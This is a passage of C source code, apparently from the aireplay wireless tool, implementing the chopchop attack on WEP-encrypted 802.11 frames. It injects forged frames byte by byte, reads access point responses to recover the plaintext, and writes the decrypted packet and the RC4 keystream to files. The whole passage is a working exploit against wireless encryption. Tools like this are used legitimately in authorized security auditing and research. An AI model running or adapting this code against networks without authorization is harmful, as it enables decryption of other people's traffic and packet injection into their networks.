            z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;

            if( ( chopped[data_end + 0] ^ savebuf[data_end + 0] ) == 0x06 &&
                ( chopped[data_end + 1] ^ savebuf[data_end + 1] ) == 0x04 &&
                ( chopped[data_end + 2] ^ savebuf[data_end + 2] ) == 0x00 )
            {
                printf( "Enabling standard workaround: "
                        "ARP header re-creation.\n" );

                chopped[z + 10] = savebuf[z + 10] ^ 0x08;
                chopped[z + 11] = savebuf[z + 11] ^ 0x06;
                chopped[z + 12] = savebuf[z + 12] ^ 0x00;
                chopped[z + 13] = savebuf[z + 13] ^ 0x01;
                chopped[z + 14] = savebuf[z + 14] ^ 0x08;
                chopped[z + 15] = savebuf[z + 15] ^ 0x00;
            }
            else
            {
                printf( "Enabling standard workaround: "
                        " IP header re-creation.\n" );

                n = pkh.caplen - ( z + 16 );

                chopped[z +  4] = savebuf[z +  4] ^ 0xAA;
                chopped[z +  5] = savebuf[z +  5] ^ 0xAA;
                chopped[z +  6] = savebuf[z +  6] ^ 0x03;
                chopped[z +  7] = savebuf[z +  7] ^ 0x00;
                chopped[z +  8] = savebuf[z +  8] ^ 0x00;
                chopped[z +  9] = savebuf[z +  9] ^ 0x00;
                chopped[z + 10] = savebuf[z + 10] ^ 0x08;
                chopped[z + 11] = savebuf[z + 11] ^ 0x00;
                chopped[z + 14] = savebuf[z + 14] ^ ( n >> 8 );
                chopped[z + 15] = savebuf[z + 15] ^ ( n & 0xFF );

                memcpy( buffer, savebuf, pkh.caplen );

                for( i = z + 4; i < (int) pkh.caplen; i++ )
                    h80211[i - 4] = h80211[i] ^ chopped[i];

                /* sometimes the header length or the tos field vary */

                for( i = 0; i < 16; i++ )
                {
                     h80211[z +  8] = 0x40 + i;
                    chopped[z + 12] = savebuf[z + 12] ^ ( 0x40 + i );

                    for( j = 0; j < 256; j++ )
                    {
                         h80211[z +  9] = j;
                        chopped[z + 13] = savebuf[z + 13] ^ j;

                        if( check_crc_buf( h80211 + z, pkh.caplen - z - 8 ) )
                            goto have_crc_match;
                    }
                }

                printf( "This doesn't look like an IP packet, "
                        "try another one.\n" );

            }

        have_crc_match:
            break;
        }

        if( ( ticks[2] * opt.nbpps ) / 1000 >= 1 )
        {
            /* send one modified frame */

            ticks[2] = 0;

            memcpy( buffer, chopped, data_end - 1 );

            /* note: guess 256 is special, it tests if the  *
             * AP properly drops frames with an invalid ICV *
             * so this guess always has its bit 8 set to 0  */

            if( is_deauth_mode )
            {
                opt.r_smac[1] |= ( guess < 256 );
                opt.r_smac[5]  = guess & 0xFF;
            }
            else
            {
                opt.r_dmac[1] |= ( guess < 256 );
                opt.r_dmac[5]  = guess & 0xFF;
            }

            memcpy( buffer + 10, opt.r_smac,  6 );
            memcpy( buffer + 16, opt.r_dmac,  6 );

            if( guess < 256 )
            {
                buffer[data_end - 2] ^= crc_chop_tbl[guess][3];
                buffer[data_end - 3] ^= crc_chop_tbl[guess][2];
                buffer[data_end - 4] ^= crc_chop_tbl[guess][1];
                buffer[data_end - 5] ^= crc_chop_tbl[guess][0];
            }

            if( send_frame( fd_out, buffer, data_end -1 ) != 0 )
            {
                if( errno != EAGAIN )
                {
                    perror( "write(802.11 packet) failed" );
                    return( 1 );
                }
            }
            else
            {
                nb_pkt_sent++;
                if( ++guess > 256 ) guess = 0;
            }
        }

        /* watch for a response from the AP */

        memset( buffer, 0, 2048 );

        if( ( caplen = read( fd_in, buffer,
                                sizeof( buffer ) ) ) < 0 )
        {
            if( errno == EAGAIN ) continue;
            perror( "read(802.11 packet) failed" );
            return( 1 );
        }

        /* if device is an atheros, remove the FCS */

        if( memcmp( argv[argc - 1], "ath", 3 ) == 0 )
            caplen -= 4;

        nb_pkt_read++;

        /* skip the prism header if present */

        h80211 = buffer;

        if( arptype_in == ARPHRD_IEEE80211_PRISM )
        {
            n = *(int *)( buffer + 4 );

            if( n < 8 || n >= (int) caplen )
                continue;

            h80211 += n;
            caplen -= n;
        }

        /* check if it's a deauthentication packet */

        if( h80211[0] == 0xC0 )
        {
            if( memcmp( h80211 + 4, opt.r_smac, 6 ) == 0 &&
                ! is_deauth_mode )
            {
                printf( "\rThe client's source MAC you have specified "
                        "does not appear to\nbe authenticated (got a "
                        "deauthentication packet from the AP).\n\n" );
                return( 1 );
            }

            if( h80211[4] != opt.r_smac[0] ) continue;
            if( h80211[6] != opt.r_smac[2] ) continue;
            if( h80211[7] != opt.r_smac[3] ) continue;
            if( h80211[8] != opt.r_smac[4] ) continue;

            if( ( h80211[5]     & 0xFE ) !=
                ( opt.r_smac[1] & 0xFE ) ) continue;

            if( ! ( h80211[5] & 1 ) )
            {
                printf( "\n\nThe Access Point does not appear to properly "
                        "discard frames with an\ninvalid ICV - try running "
                        "aireplay in authenticated mode (-h) instead.\n\n" );
                return( 1 );
            }
        }
        else
        {
            if( is_deauth_mode )
                continue;

            /* check if it's a WEP data packet */

            if( ( h80211[0] & 0x0C ) != 8 ) continue;
            if( ( h80211[0] & 0xF0 ) != 0 ) continue;
            if( ( h80211[1] & 0x03 ) != 2 ) continue;
            if( ( h80211[1] & 0x40 ) == 0 ) continue;

            /* check the extended IV (TKIP) flag */

            z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;

            if( ( h80211[z + 3] & 0x20 ) != 0 ) continue;

            /* check the destination address */

            if( h80211[4] != opt.r_dmac[0] ) continue;
            if( h80211[6] != opt.r_dmac[2] ) continue;
            if( h80211[7] != opt.r_dmac[3] ) continue;
            if( h80211[8] != opt.r_dmac[4] ) continue;

            if( ( h80211[5]     & 0xFE ) !=
                ( opt.r_dmac[1] & 0xFE ) ) continue;

            if( ! ( h80211[5] & 1 ) )
            {
                printf( "\n\nThe Access Point does not appear to properly "
                        "discard frames with an\ninvalid ICV - try running "
                        "aireplay in non-authenticated mode instead.\n\n" );
                return( 1 );
            }
        }

        /* we have a winner */

        guess = h80211[9];

        chopped[data_end - 1] ^= guess;
        chopped[data_end - 2] ^= crc_chop_tbl[guess][3];
        chopped[data_end - 3] ^= crc_chop_tbl[guess][2];
        chopped[data_end - 4] ^= crc_chop_tbl[guess][1];
        chopped[data_end - 5] ^= crc_chop_tbl[guess][0];

        n = pkh.caplen - data_start;

        printf( "\rOffset %4d (%2d%% done) | xor = %02X | pt = %02X | "
                "%4ld frames written in %5.0fms\n", data_end - 1,
                100 * ( pkh.caplen - data_end ) / n,
                chopped[data_end - 1],
                chopped[data_end - 1] ^ savebuf[data_end - 1],
                nb_pkt_sent, ticks[3] );

        nb_pkt_sent = ticks[3] = 0;

        guess = 256;

        if( is_deauth_mode )
        {
            opt.r_smac[1] = rand() & 0x3E;
            opt.r_smac[2] = rand() & 0xFF;
            opt.r_smac[3] = rand() & 0xFF;
            opt.r_smac[4] = rand() & 0xFF;
        }
        else
        {
            opt.r_dmac[1] = rand() & 0xFE;
            opt.r_dmac[2] = rand() & 0xFF;
            opt.r_dmac[3] = rand() & 0xFF;
            opt.r_dmac[4] = rand() & 0xFF;
        }

        data_end--;

        alarm( 0 );
    }

    /* reveal the plaintext (chopped contains the prga) */

    h80211 = savebuf;

    z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;

    chopped[z + 4] = savebuf[z + 4] ^ 0xAA;
    chopped[z + 5] = savebuf[z + 5] ^ 0xAA;
    chopped[z + 6] = savebuf[z + 6] ^ 0x03;
    chopped[z + 7] = savebuf[z + 7] ^ 0x00;
    chopped[z + 8] = savebuf[z + 8] ^ 0x00;
    chopped[z + 9] = savebuf[z + 9] ^ 0x00;

    for( i = z + 4; i < (int) pkh.caplen; i++ )
        h80211[i - 4] = h80211[i] ^ chopped[i];

    if( ! check_crc_buf( h80211 + z, pkh.caplen - z - 8 ) )
        printf( "\nWarning: ICV checksum verification FAILED!\n" );

    pkh.caplen -= 4 + 4; /* remove the WEP IV & CRC (ICV) */
    pkh.len    -= 4 + 4; 

    h80211[1] &= 0xBF;   /* remove the WEP bit, too */

    /* save the decrypted packet */

    sprintf( tmp_str, "replay_dec-%02d%02d%02d-%02d%02d%02d.cap",
             lt->tm_year - 100, 1 + lt->tm_mon, lt->tm_mday,
             lt->tm_hour, lt->tm_min, lt->tm_sec );

    printf( "\nSaving plaintext in %s\n", tmp_str );

    if( ( f_cap_out = fopen( tmp_str, "wb+" ) ) == NULL )
    {
        perror( "fopen(output pcap,wb+) failed" );
        return( 1 );
    }

    n = sizeof( struct pcap_file_header );

    if( fwrite( &pfh, 1, n, f_cap_out ) != (size_t) n )
    {
        perror( "fwrite(pcap file header) failed" );
        return( 1 );
    }

    n = sizeof( pkh );

    if( fwrite( &pkh, 1, n, f_cap_out ) != (size_t) n )
    {
        perror( "fwrite(packet header) failed" );
        return( 1 );
    }

    n = pkh.caplen;

    if( fwrite( h80211, 1, n, f_cap_out ) != (size_t) n )
    {
        perror( "fwrite(packet data) failed" );
        return( 1 );
    }

    /* save the RC4 xor mask (prga) */

    sprintf( tmp_str, "replay_dec-%02d%02d%02d-%02d%02d%02d.xor",
             lt->tm_year - 100, 1 + lt->tm_mon, lt->tm_mday,
             lt->tm_hour, lt->tm_min, lt->tm_sec );

    printf( "Saving keystream in %s\n", tmp_str );

    if( ( f_cap_out = fopen( tmp_str, "wb+" ) ) == NULL )
    {
        perror( "fopen(output prga,wb+) failed" );
        return( 1 );
    }

    n = pkh.caplen + 8 - z;

    if( fwrite( chopped + z, 1, n, f_cap_out ) != (size_t) n )
    {
        perror( "fwrite(prga data) failed" );
        return( 1 );
    }

    printf( "\nCompleted in %lds (%0.2f bytes/s)\n\n",
            time( NULL ) - tt,
            (float) ( pkh.caplen - 6 - z ) / 
            (float) ( time( NULL ) - tt  ) );

    /* that's all, folks */

    return( 0 );
}
